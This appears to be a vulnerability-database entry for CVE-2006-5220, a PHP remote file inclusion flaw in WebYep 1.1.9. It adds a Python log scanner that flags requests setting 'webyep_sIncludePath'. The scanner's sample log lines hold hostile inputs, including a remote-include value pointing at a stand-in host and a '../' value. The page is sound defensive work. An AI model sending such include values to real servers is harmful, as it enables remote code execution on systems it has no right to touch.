PHP Remote File Inclusion Vulnerability in WebYep by Obdev
CVE-2006-5220

Currently unrated

Key Information:

CVE Published: 10 October 2006

What is CVE-2006-5220?

WebYep 1.1.9 contains multiple PHP remote file inclusion vulnerabilities caused by insecure handling of the 'webyep_sIncludePath' variable when 'register_globals' is enabled. With that setting on, PHP creates global variables from request parameters, so a remote attacker can supply the variable's value. The flaw is reachable through specific PHP files in the 'programm/lib/' and 'programm/elements/' directories, as well as 'programm/webyep.php', and can lead to execution of arbitrary PHP code on the affected server. It highlights the need for web applications to follow secure coding practices and for servers to be configured securely to mitigate such risks.
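
A detection sketch for the condition described above, as an added example that is not part of the original advisory or of WebYep's code: it flags access-log requests that supply 'webyep_sIncludePath' in the query string to the affected paths, since a client has no legitimate reason to set it. The common/combined log format, the placeholder file name and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Paths named in the advisory ('programm' is the product's own spelling).
AFFECTED = re.compile(r"/programm/(?:lib/|elements/|webyep\.php)", re.I)
PARAM = "webyep_sincludepath"  # compared case-insensitively to also catch probes
# Client, request target and status of a common/combined-format log entry (assumed).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE = re.compile(r"^(?:https?|ftp)://", re.I)


def inspect(line):
    """Return a finding if the request sets webyep_sIncludePath on an affected path."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    if not AFFECTED.search(unquote(parts.path)):
        return None
    # parse_qsl percent-decodes names and values before we compare them.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == PARAM:
            return {"client": client, "path": parts.path, "status": int(status),
                    "remote_value": bool(REMOTE.match(value.strip()))}
    return None


def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [f for f in map(inspect, lines) if f]


# Constructed sample lines; addresses and host names are documentation values.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2006:13:55:36 +0000] "GET /programm/webyep.php'
    '?webyep_sIncludePath=http%3A%2F%2Fhost.example%2Fx%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2006:13:56:01 +0000] "GET /programm/elements/'
    'PLACEHOLDER.php?webyep_sIncludePath=../ HTTP/1.0" 404 210',
    '192.0.2.10 - - [10/Oct/2006:13:57:12 +0000] "GET /programm/webyep.php HTTP/1.1" 200 1024',
    '192.0.2.10 - - [10/Oct/2006:13:58:40 +0000] "GET /index.php'
    '?webyep_sIncludePath=http://host.example/ HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with a 200 status and `remote_value` set deserves the closest look, because the request was served rather than rejected.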

EPSS Score

10% chance of being exploited in the next 30 days.

Timeline

  • Vulnerability published

  • Vulnerability Reserved
